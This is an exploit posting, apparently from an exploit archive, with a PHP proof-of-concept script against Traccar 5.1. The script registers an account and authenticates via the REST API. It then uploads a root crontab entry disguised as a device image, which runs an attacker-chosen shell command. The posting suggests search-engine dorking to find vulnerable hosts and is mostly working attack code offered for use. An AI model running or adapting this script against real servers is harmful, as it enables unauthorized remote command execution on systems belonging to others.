============================================================================================================================================= | # Title : Traccar 5.1 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.traccar.org/old-versions/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs. [+] save payload as poc.php [+] usage : C:\www\test>php poc.php [+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/'); [+] payload : host = $host; $this->port = $port; $this->username = $username; $this->password = $password; $this->email = $email; $this->target_uri = $target_uri; } public function send_request($method, $uri, $data = null, $ctype = 'application/json') { $url = "http://{$this->host}:{$this->port}{$uri}"; $headers = [ "Content-Type: {$ctype}", ]; $ch = curl_init($url); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $response = curl_exec($ch); curl_close($ch); return json_decode($response, true); } public function register_user() { echo "Registering new user...\n"; $body = json_encode([ 'name' => $this->username, 'email' => $this->email, 'password' => $this->password, 'totpKey' => null ]); $res = $this->send_request('POST', $this->target_uri . 'api/users', $body); if (!$res || $res['code'] !== 200) { die("Failed to register user. Response: " . print_r($res, true)); } echo "User registered successfully.\n"; } public function authenticate() { echo "Authenticating...\n"; $data = http_build_query([ 'email' => $this->email, 'password' => $this->password ]); $res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded'); if (!$res || $res['code'] !== 200) { die("Failed to authenticate. Response: " . print_r($res, true)); } echo "Authenticated successfully.\n"; } public function upload_cron_file($cmd) { echo "Adding new device...\n"; $body = json_encode([ 'name' => bin2hex(random_bytes(8)), 'uniqueId' => bin2hex(random_bytes(8)) ]); $res = $this->send_request('POST', $this->target_uri . 'api/devices', $body); if (!$res || $res['code'] !== 200) { die("Failed to add device. Response: " . print_r($res, true)); } $device_id = $res['id']; $cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n"; $cron_filename = bin2hex(random_bytes(6)); echo "Uploading crontab file...\n"; $file_data = [ 'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png") ]; $this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data'); echo "Cronjob file uploaded successfully. Waiting for execution...\n"; } public function exploit($cmd) { $this->register_user(); $this->authenticate(); $this->upload_cron_file($cmd); } } // Usage example: $exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/'); $exploit->exploit('id'); // Replace 'id' with your desired command to execute ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================